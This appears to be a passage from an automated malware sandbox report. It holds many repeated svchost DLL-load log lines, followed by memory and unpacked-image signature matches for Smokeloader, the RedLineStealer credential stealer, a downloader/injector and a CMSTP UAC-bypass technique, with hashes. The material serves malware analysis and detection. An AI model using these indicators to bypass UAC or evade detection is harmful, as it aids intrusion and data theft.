                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: IIBXMzS0zN.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 17.2.6374.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.6374.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 27.0.914D.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                      Source: 00000025.00000002.1910346635.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000026.00000002.1929625972.0000000002BFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000007.00000002.1644186727.0000000002625000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000025.00000002.1913902392.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000026.00000002.1931017304.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000006.00000002.1658865401.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000001D.00000002.1943821340.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000025.00000002.1914262118.0000000002F3A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1433007725.000000000054F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1432875681.0000000000511000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000001F.00000002.1833599796.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1432458684.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000006.00000002.1658547253.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000006.00000002.1659020384.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
